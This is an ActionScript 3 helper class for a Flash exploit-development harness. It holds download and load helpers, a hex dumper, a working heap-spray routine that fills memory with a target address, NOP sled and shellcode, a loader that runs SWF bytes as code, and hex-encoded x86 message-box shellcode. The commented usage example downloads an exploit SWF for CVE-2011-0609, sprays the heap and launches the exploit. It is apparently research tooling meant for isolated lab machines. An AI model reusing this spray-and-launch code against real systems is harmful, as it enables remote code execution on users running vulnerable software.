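package {
    // See example usage at end of file.
    import flash.display.*;
    import flash.system.*;
    import flash.text.*;
    import flash.utils.*;
    import flash.events.*;
    import flash.external.*;
    import flash.net.*;
    import flash.filesystem.*;
    import fl.controls.UIScrollBar; // Drag the Flex UIScrollBar component to the Library panel.
    import flash.errors.IOError;

    /**
     * Helper.as - glue for an exploit-development harness: an on-stage log
     * window, download / load-from-disk / save-to-disk helpers, a hex dumper,
     * a heap spray and a loader that runs a SWF from raw bytes.
     *
     * Security note for anyone reusing this: download() and LoadFile() hand
     * back whatever bytes they were given, heap_spray() fills the process
     * heap with an attacker-chosen address plus shellcode, and loadSWF()
     * executes any ActionScript contained in the bytes it is given. None of
     * the inputs are validated beyond basic shape checks, so this class is
     * only appropriate inside an isolated lab VM, never in anything that
     * handles data from a network peer you do not control.
     */
    public class Helper {
        private var version:String = "Helper.as version 0.2 - http://sandsprite.com";

        /** Scrollable on-stage log; written by xx(). */
        public var myText:TextField;
        private var mySb:UIScrollBar = new UIScrollBar();

        // Only the most recently created button/label pair is tracked; hideButton()
        // acts on that pair and earlier ones stay on stage untouched.
        private var my_button:SimpleButton;
        private var buttonText:TextField;

        /** Display container everything is added to (whatever the caller passed in). */
        public var parentClass;

        /** Holds the sprayed blocks so they stay allocated until free() is called. */
        static var allocs:Array;
        /** Scratch buffer built by init_pool(); released at the end of heap_spray(). */
        static var pool:ByteArray;

        /**
         * @param p display container (e.g. the document class) that the log
         *          window, buttons and loaded SWFs are added to.
         */
        public function Helper(p) {
            parentClass = p;
            createLogWindow(5, 5, 560, 380);
        }

        /**
         * Fetch a URL as binary and deliver it asynchronously.
         *
         * @param url              location to load.
         * @param completeCallback function(data:ByteArray, success:Boolean);
         *                         called exactly once with (bytes, true) on
         *                         success or (null, false) on any failure.
         *
         * Besides IO errors this also listens for SecurityErrorEvent, which is
         * what the player raises for a cross-domain load without a policy
         * file; without that listener the callback never fired and the
         * error surfaced only as an uncaught event.
         */
        public function download(url:String, completeCallback):void {
            var loader:URLLoader = new URLLoader();

            // Both error events derive from ErrorEvent, which carries .text.
            var onError:Function = function(event:ErrorEvent):void {
                xx("failed to download: " + event.text);
                completeCallback(null, false);
            };
            var onLoadComplete:Function = function(event:Event):void {
                xx("download complete received " + loader.data.length.toString(16) + " bytes");
                completeCallback(loader.data, true);
            };

            xx("Downloading " + url);
            loader.dataFormat = URLLoaderDataFormat.BINARY;
            loader.addEventListener(Event.COMPLETE, onLoadComplete);
            loader.addEventListener(IOErrorEvent.IO_ERROR, onError);
            loader.addEventListener(SecurityErrorEvent.SECURITY_ERROR, onError);
            try {
                loader.load(new URLRequest(url));
            } catch (e:*) {
                // load() itself can throw (bad URL, sandbox restrictions); report
                // through the same callback so the caller has one failure path.
                xx("Error downloading file: " + e);
                completeCallback(null, false);
            }
        }

        /**
         * Put a "Load File" button on stage; when clicked, let the user pick a
         * local file and deliver its contents.
         *
         * @param callback function(data:ByteArray, success:Boolean); receives
         *                 (bytes, true) once the file is read, or (null, false)
         *                 if the dialog is cancelled or the read fails.
         * @param x, y     button position.
         */
        public function LoadFile(callback, x = 5, y = 5):void {
            // Declared at function scope (and captured by the closures below) so
            // the FileReference is not collected while the dialog is open.
            var fileRef:FileReference;
            createButton("Load File", button_click, x, y);

            var onCancel:Function = function(event:Event):void {
                hideButton();
                callback(null, false);
            };
            var onFileSelected:Function = function(event:Event):void {
                fileRef.addEventListener(Event.COMPLETE, onFileLoaded);
                fileRef.addEventListener(IOErrorEvent.IO_ERROR, onCancel);
                fileRef.load();
            };
            var onFileLoaded:Function = function(event:Event):void {
                xx("loaded local file size: " + event.target.data.length.toString(16));
                hideButton();
                callback(event.target.data, true);
            };

            function button_click(m:MouseEvent):void {
                // In the browser, browse() only succeeds in response to a user event.
                fileRef = new FileReference();
                fileRef.browse([new FileFilter("All Files", "*.*;")]);
                fileRef.addEventListener(Event.SELECT, onFileSelected);
                fileRef.addEventListener(Event.CANCEL, onCancel);
            }
        }

        /**
         * Put a "Save Data" button on stage; when clicked, prompt the user to
         * save `ba` to disk (suggested name "xxx.bin").
         *
         * @param ba               bytes to write.
         * @param optionalCallback function(success:Boolean), or null.
         * @param x, y             button position.
         */
        public function Save2Disk(ba:ByteArray, optionalCallback = null, x:uint = 5, y:uint = 5):void {
            // Kept at function scope rather than local to button_click so the
            // object outlives the click handler; Adobe's FileReference guidance
            // is that an unreferenced instance may be collected before the
            // save dialog completes, in which case the callbacks never fire.
            var fr:FileReference;
            createButton("Save Data", button_click, x, y);

            var onCancel:Function = function(event:Event):void {
                hideButton();
                if (optionalCallback) optionalCallback(false);
            };
            var onComplete:Function = function(event:Event):void {
                hideButton();
                if (optionalCallback) optionalCallback(true);
            };

            function button_click(m:MouseEvent):void {
                // In the browser, save() only succeeds in response to a user event.
                fr = new FileReference();
                fr.addEventListener(Event.CANCEL, onCancel);
                fr.addEventListener(Event.COMPLETE, onComplete);
                fr.addEventListener(IOErrorEvent.IO_ERROR, onCancel);
                fr.save(ba, "xxx.bin"); // `ba` is captured by this closure, so it is still valid here
            }
        }

        /**
         * Return the bundled test payload as raw bytes.
         *
         * The hex below is decoded verbatim. The function name and the ASCII
         * text embedded near the end of the string ("shellcode successful")
         * indicate a message-box test stub; confirm in a disassembler before
         * relying on its exact behaviour.
         */
        public function GetMsgboxSc():ByteArray {
            var shex:String =
                "90FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF" +
                "31C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885C0744A01D0508B48188B58" +
                "2001D3E33C498B348B01D631FF31C0ACC1CF0D01C738E075F4037DF83B7D2475E2588B582401D3668B" +
                "0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE0585F5A8B12EB865D8D85A70000006A006A" +
                "00506A006845835607FFD56A0068F0B5A256FFD57368656C6C636F6465207375636365737366756C00" +
                "909090";
            var sc:ByteArray = hexToBin(shex);
            //xx("GetMsgboxSc length: " + sc.length);
            return sc;
        }

        /** Append one line to the log window and refresh the scrollbar. */
        public function xx(x):void {
            this.myText.text += x + "\n";
            this.mySb.scrollTarget = this.myText;
        }

        /**
         * Write a classic 16-bytes-per-row hex/ASCII dump of `bytes` to the log.
         *
         * @param bytes  buffer to dump (null is reported and ignored).
         * @param start  1-based index of the first byte to show (0 is treated as 1).
         * @param length 1-based index of the LAST byte to show, not a count;
         *               0 or anything past the end means "through the end".
         *               With start == 1 this coincides with a byte count.
         *
         * Side effect: leaves bytes.position just after the last byte read.
         *
         * Row breaks happen at absolute offsets that are multiples of 16, so a
         * dump starting mid-row has a short first row. The final row is padded
         * only when it is actually partial; the previous version emitted an
         * extra empty row whenever the dump ended exactly on a row boundary.
         */
        public function hexdump(bytes:ByteArray, start:uint = 1, length:uint = 0):void {
            if (bytes == null) {
                xx("hexdump: null buffer");
                return;
            }
            var output:String = "";
            var charbuf:String = "";
            var shown:uint = 0; // bytes emitted on the current row
            if (start == 0) start = 1;
            if (length > bytes.length || length == 0) length = bytes.length;
            bytes.position = start - 1; // parameters are 1-based, ByteArray is 0-based

            for (var i:uint = start; i <= length; i++) {
                var b:uint = bytes.readUnsignedByte();
                // Printable ASCII only (0x20..0x7E); everything else is shown as '.'
                charbuf += (b >= 0x20 && b <= 0x7E) ? String.fromCharCode(b) : ".";
                output += byte2hex(b) + " ";
                shown++;
                if (i % 16 == 0) {
                    output += "\t" + charbuf + "\n";
                    charbuf = "";
                    shown = 0;
                }
            }
            if (shown != 0) {
                // Pad the partial last row so the ASCII column lines up ("XX " is 3 wide).
                for (; shown < 16; shown++) output += "   ";
                output += " ";
                output += "\t" + charbuf + "\n";
            }
            xx(output);
        }

        /** Two uppercase hex digits for the low byte of `byte`. */
        public function byte2hex(byte:uint):String {
            var hex:String = (byte & 0xFF).toString(16).toUpperCase();
            return hex.length < 2 ? "0" + hex : hex;
        }

        /**
         * Decode a hex string ("90FC...") into a ByteArray.
         *
         * @param param1   hex digits, two per byte, no separators or prefix.
         * @param endiness endian setting applied to the returned ByteArray
         *                 (affects later multi-byte reads/writes only).
         * @return the decoded bytes; an empty ByteArray for null input.
         * @throws ArgumentError on odd length or a non-hex character. The
         *         previous version silently wrote 0x00 for bad pairs, which
         *         corrupts a payload without any indication.
         */
        public static function hexToBin(param1:String, endiness = Endian.LITTLE_ENDIAN):ByteArray {
            var out:ByteArray = new ByteArray();
            out.endian = endiness;
            if (param1 == null) return out;
            if (param1.length % 2 != 0) {
                throw new ArgumentError("hexToBin: odd-length hex string (" + param1.length + " chars)");
            }
            var hexPair:RegExp = /^[0-9A-Fa-f]{2}$/;
            for (var pos:uint = 0; pos < param1.length; pos += 2) {
                var pair:String = param1.substr(pos, 2);
                if (!hexPair.test(pair)) {
                    throw new ArgumentError("hexToBin: invalid hex pair '" + pair + "' at offset " + pos);
                }
                out.writeByte(parseInt(pair, 16));
            }
            return out;
        }

        /**
         * Instantiate a SWF from raw bytes and add it to the stage.
         *
         * WARNING: whatever ActionScript the bytes contain runs inside this
         * player; treat `ba` as executable code, not data. Load errors are
         * logged via the loader's contentLoaderInfo.
         */
        public function loadSWF(ba:ByteArray):void {
            var loader:Loader = new Loader();
            var loaderContext:LoaderContext = new LoaderContext(false);
            loader.contentLoaderInfo.addEventListener(IOErrorEvent.IO_ERROR, function(e:IOErrorEvent):void {
                xx("loadSWF failed: " + e.text);
            });
            loader.loadBytes(ba, loaderContext);
            parentClass.addChild(loader);
        }

        /**
         * Fill the heap with copies of one pattern block.
         *
         * Each block is laid out as:
         *   [prefixSize bytes of `address` repeated]
         *   [8 bytes of 0x90 (x86 NOP)]
         *   [sc]
         *   [`address` repeated up to bufSize]
         * then replicated by init_pool() and cut into `blocks` + 1 copies of
         * allocSize bytes, all retained in the static `allocs` array until
         * free() is called.
         *
         * @param sc         shellcode to embed (must be non-null).
         * @param address    32-bit value used as the filler / target pointer.
         * @param prefixSize bytes of filler before the NOPs; 0 = 5140 - 32.
         * @param bufSize    size of one pattern block; 0 = 65536.
         * @param allocSize  size of each retained allocation; 0 = 1048576 - 3840 - 36.
         * @param blocks     number of additional copies to retain; 0 = 1280.
         * @throws ArgumentError if sc is null, if prefix + NOPs + shellcode do
         *         not fit in bufSize (the previous version silently produced
         *         an oversize, misaligned block), or if allocSize exceeds the
         *         pool built from the block.
         */
        public function heap_spray(sc:ByteArray, address:uint, prefixSize:uint = 0, bufSize:uint = 0, allocSize:uint = 0, blocks:uint = 0):void {
            if (sc == null) throw new ArgumentError("heap_spray: shellcode is null");
            if (prefixSize == 0) prefixSize = 5140 - 32;
            if (bufSize == 0) bufSize = 65536;
            if (allocSize == 0) allocSize = 1048576 - 3840 - 36;
            if (blocks == 0) blocks = 1280;

            var headerLen:uint = prefixSize + 8 + sc.length;
            if (headerLen > bufSize) {
                throw new ArgumentError("heap_spray: prefix + NOPs + shellcode (" + headerLen + " bytes) exceeds bufSize (" + bufSize + ")");
            }

            allocs = new Array();

            var buf:ByteArray = new ByteArray();
            buf.endian = Endian.LITTLE_ENDIAN;
            var i:uint;
            for (i = 0; i < prefixSize; i += 4) buf.writeUnsignedInt(address);
            buf.writeUnsignedInt(0x90909090);
            buf.writeUnsignedInt(0x90909090);
            buf.writeBytes(sc);
            for (i = buf.length; i < bufSize; i += 4) buf.writeUnsignedInt(address);

            init_pool(buf);
            if (allocSize > pool.length) {
                throw new ArgumentError("heap_spray: allocSize (" + allocSize + ") exceeds pool size (" + pool.length + ")");
            }
            var first:ByteArray = new ByteArray();
            first.writeBytes(pool, 0, allocSize);
            allocs.push(first);
            pool = null; // the pool was only needed to build the first copy

            for (i = 0; i < blocks; i++) {
                var copy:ByteArray = new ByteArray();
                copy.writeBytes(first, 0, allocSize);
                allocs.push(copy);
            }
        }

        /**
         * Build the static `pool` by repeatedly doubling `ba` until it is at
         * least `size` bytes long.
         *
         * @throws ArgumentError if `ba` is null or empty; an empty seed never
         *         grows, so the previous version looped forever on it.
         */
        public static function init_pool(ba:ByteArray, size:uint = 0x100000):void {
            if (ba == null || ba.length == 0) {
                throw new ArgumentError("init_pool: seed buffer is null or empty");
            }
            pool = new ByteArray();
            pool.writeBytes(ba);
            while (pool.length < size) {
                var snapshot:ByteArray = new ByteArray();
                snapshot.writeBytes(pool);
                pool.writeBytes(snapshot);
            }
        }

        /** Drop the references to the sprayed blocks so the GC can reclaim them. */
        public static function free():void {
            allocs = null;
        }

        /**
         * Set the log window's visibility. Despite the name, the argument is
         * the visibility flag: hideLog() (default true) SHOWS the log and
         * hideLog(false) hides it. Kept as-is for existing callers.
         */
        public function hideLog(setting:Boolean = true):void {
            myText.visible = setting;
            mySb.visible = setting;
        }

        /** Hide the most recently created button and its label. */
        public function hideButton():void {
            my_button.visible = false;
            buttonText.visible = false;
        }

        /**
         * Create a 100x25 button with a centred caption at (x, y) and wire
         * `handler` to its CLICK event. The pair becomes the one tracked by
         * hideButton(); earlier buttons are left on stage.
         *
         * SimpleButton has no caption of its own, so the label is a separate
         * mouse-transparent TextField placed over it.
         */
        public function createButton(caption, handler, x:uint = 5, y:uint = 5):void {
            my_button = new SimpleButton();
            buttonText = new TextField();
            my_button.x = x;
            my_button.y = y;
            my_button.upState = getButton();
            my_button.overState = getButton(0xc9c9c9);
            my_button.downState = getButton(0x9c9c9c);
            my_button.hitTestState = my_button.upState;
            buttonText.x = my_button.x;
            buttonText.y = my_button.y + 2;
            buttonText.width = my_button.width;
            buttonText.selectable = false;
            buttonText.mouseEnabled = false; // let clicks pass through the label to the button
            var fmt:TextFormat = new TextFormat();
            fmt.font = "Arial";
            fmt.color = 0x000000;
            fmt.size = 18;
            fmt.bold = false;
            fmt.align = TextFormatAlign.CENTER;
            buttonText.defaultTextFormat = fmt;
            buttonText.text = caption;
            my_button.addEventListener(MouseEvent.CLICK, handler);
            this.parentClass.addChild(my_button);
            this.parentClass.addChild(buttonText);

            function getButton(color = 0xc0c0c0):Shape {
                var s:Shape = new Shape();
                s.graphics.beginFill(color, 1);
                // The shape is drawn in the button's own coordinate space, which is
                // already positioned at (x, y); drawing at (x, y) again, as the
                // previous version did, shifted the face to (2x, 2y) away from its label.
                s.graphics.drawRect(0, 0, 100, 25);
                s.graphics.endFill();
                return s;
            }
        }

        /**
         * Create the log TextField and its vertical scrollbar, add both to
         * parentClass and return the TextField (the declared return type was
         * previously not honoured).
         */
        private function createLogWindow(x:Number, y:Number, width:Number, height:Number):TextField {
            this.myText = new TextField();
            this.myText.x = x;
            this.myText.y = y;
            this.myText.width = width;
            this.myText.height = height;
            this.myText.multiline = true;
            this.myText.selectable = true;
            this.myText.thickness = 3;
            this.myText.border = true;
            var format:TextFormat = new TextFormat();
            format.font = "Courier";
            format.size = 15;
            this.myText.defaultTextFormat = format;
            parentClass.addChild(this.myText);

            mySb.direction = "vertical";
            // Place the scrollbar flush against the text field's right edge.
            mySb.move(this.myText.x + this.myText.width, this.myText.y);
            this.mySb.setSize(this.myText.width, this.myText.height);
            this.mySb.scrollTarget = this.myText;
            parentClass.addChild(mySb);
            return this.myText;
        }
    }
}

/* Example usage:
package {
    import flash.display.*;
    import flash.system.*;
    import flash.text.*;
    import flash.utils.*;
    import flash.events.*;
    import flash.external.*;
    import flash.net.*;
    import flash.filesystem.*;
    public class Main extends MovieClip {
        public var swf:ByteArray;
        public var sc:ByteArray;
        var h:Helper = new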
Helper(this); public function exploitbutton_click(event):void{ h.hideButton(); ExploitManager(3);} public function Main() { h.xx("Starting..."); sc = h.GetMsgboxSc(); h.xx("Shellcode loaded size: " + sc.length.toString(16) ) ; ExploitManager(); } public function ExploitManager(step:uint=0){ //handle async events.. try{ switch(step){ case 0: h.xx("Downloading exploit swf file..") h.download("http://192.168.0.10/CVE-2011-0609_EXPLOIT/CVE_2011-0609.exploit", download_callback); break; case 1: h.xx("Starting heap spray"); h.heap_spray(sc, 0x14141414); h.xx("Press button to launch exploit...") h.createButton(" EXPLOIT!", exploitbutton_click); break; case 3: h.xx("Running exploit swf.."); h.loadSWF(swf); break; } }catch(err:Error){ h.xx("Caught error in ExploitManager step="+step+ " Message: " + err.message); } } public function download_callback(data:ByteArray, success:Boolean){ if(success){ h.xx("Download Size: " + data.length.toString(16)); h.hexdump(data,1,0x20) ; swf = data; //uncompress, convert from hexstring, xor, etc here... ExploitManager(1); }else{ h.xx("Download failed"); } } public function file_loaded(data:ByteArray, success:Boolean){ if(success){ h.xx("success"); h.xx("File Length: " + data.length.toString(16)); h.hexdump(data,1,0x20) ; }else{ h.xx("LoadFile failed"); } } public function savefile_callback(success:Boolean){ h.xx("SaveFile: " + success); } } } */